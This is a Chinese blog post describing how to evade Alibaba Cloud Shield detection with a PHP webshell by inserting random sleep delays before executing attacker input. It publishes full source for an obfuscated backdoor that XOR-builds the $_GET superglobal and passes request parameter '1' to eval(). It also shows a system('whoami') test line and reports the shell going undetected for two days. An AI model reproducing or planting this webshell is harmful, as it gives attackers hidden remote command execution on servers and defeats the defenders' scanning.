免杀阿里云盾思路及利用
首页 > 学习    作者:Iamyc   2020年1月19日 16:15 星期日   热度:439°   百度已收录  
时间:2020-1-19 16:15   热度:439° 

首先,webshell原型来自这儿:http://lang-v.com/first_cms/yc/emlog/src/?post=128

当时免杀D盾,但是在阿里云服运行后30分钟就被查杀出来了。

最开始想的是动态行为,比如eval函数执行敏感操作导致查杀了

针对此,我后来又分析了一些,比如常见的进行加解密操作,字符混淆。。。

最后,都没有成功,也是气人。

所以,阿里云服的查杀引擎应该是有检测动态行为的。

那么,在这个层面怎么利用呢?

最简单的一个思路:脱节

如果说我能在云服执行eval(phpinfo(););然后报毒,那么查杀点不在于执行了敏感操作。

这个我也没测过,比如写个php文件

<?php eval(system("whoami"););?>

如果这个不报毒的话(没测试),同时因为我请求中传递了GET、POST等参数导致敏感操作

那么就可以针对此行为进行预警并进一步分析。

所以,如果我GET、POST参数后,sleep休眠一下呢?

当然,后来查资料,发现sleep也是非常常见的动态监测对抗

当然,这个对于远控马可能不太好使,大部分引擎估计直接hook系统sleep函数就行

但是webshell可能还可以利用

最后确实,两天前用sleep的新版小马执行操作,现在都还没收到云盾提醒

当然,确定也很明显,延时可能有点烦,延时下限也没测,各位自己尝试下吧

源码


<?php
class yc{
 public function __construct(){
 $args_num = func_num_args();
 if($args_num==3){
	sleep(func_get_arg(2));
	echo "yc";
            eval(func_get_arg(0));
        }
 }
}
sleep(3);
$keys = rand(1,5);
$a=${(chr(63)^chr(96)).(chr(60)^chr(123)).(chr(62)^chr(123)).
(chr(47)^chr(123))}[chr(49)];
sleep($keys);
$yc=new yc($a,$a,$keys);

?>



二维码加载中...
本文作者:Iamyc      文章标题: 免杀阿里云盾思路及利用
本文地址:http://lang-v.com/first_cms/yc/emlog/src/?post=132
版权声明:若无注明,本文皆为“YC's Blog”原创,转载请保留文章出处。

返回顶部    首页    手机版本    后花园  
版权所有:YC's Blog    站长: Iamyc    程序:emlog